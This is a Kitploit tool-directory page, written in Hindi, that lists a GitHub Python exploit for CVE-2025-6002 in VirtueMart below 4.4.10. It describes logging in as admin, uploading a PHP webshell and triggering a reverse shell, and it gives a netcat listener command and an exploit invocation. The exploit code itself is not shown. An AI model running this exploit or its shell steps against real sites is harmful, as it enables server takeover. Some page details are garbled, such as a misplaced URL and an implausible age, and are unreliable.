Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-6002 — CVE-2025-6002 के लिए पायथन एक्सप्लॉइट जो VirtueMart < 4.4.10 में प्रमाणित मनमाना फ़ाइल अपलोड को लक्षित करता है। लॉग इन करता है, एक PHP वेबशेल अपलोड करता है, और पेनिट्रेशन परीक्षण के लिए रिवर्स शेल ट्रिगर करता है। | Kitploit
उपकरण/GitHubGitHub/schn1tzelme1ster/cve-2025-6002
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubschn1tzelme1ster/cve-2025-6002

CVE-2025-6002

CVE-2025-6002 के लिए पायथन एक्सप्लॉइट जो VirtueMart < 4.4.10 में प्रमाणित मनमाना फ़ाइल अपलोड को लक्षित करता है। लॉग इन करता है, एक PHP वेबशेल अपलोड करता है, और पेनिट्रेशन परीक्षण के लिए रिवर्स शेल ट्रिगर करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
106 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2025-6002 के लिए शोषण

यह स्क्रिप्ट VirtueMart < 4.4.10 (CVE-2025-6002) में प्रमाणित मनमानी फ़ाइल अपलोड भेद्यता का शोषण करती है, जिसका वर्णन इस ब्लॉग पोस्ट में किया गया है: https://blog.blacklanternsecurity.com/p/doomla-zero-days

यह स्क्रिप्ट दिए गए क्रेडेंशियल्स के साथ VirtueMart में लॉग इन करती है, एक नया उत्पाद बनाती है और एक PHP वेबशेल को मीडिया फ़ाइल के रूप में अपलोड करती है। फिर यह प्रदान किए गए IP/पोर्ट पर एक रिवर्स शेल को लागू करती है।

पैरामीटर:

  • --url: VirtueMart का URL
  • --username: व्यवस्थापक उपयोगकर्ता नाम
  • --password: व्यवस्थापक पासवर्ड
  • --remote-ip: हमलावर का IP पताhttps://github.com/schn1tzelme1ster/CVE-2025-6002/tree/main
  • --remote-port: हमलावर का पोर्ट

उपयोग:

  1. हमलावर मशीन पर Netcat चलाएँ:
nc -nlvp 1337
  1. शोषण निष्पादित करें:
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337
टूल डाउनलोड करें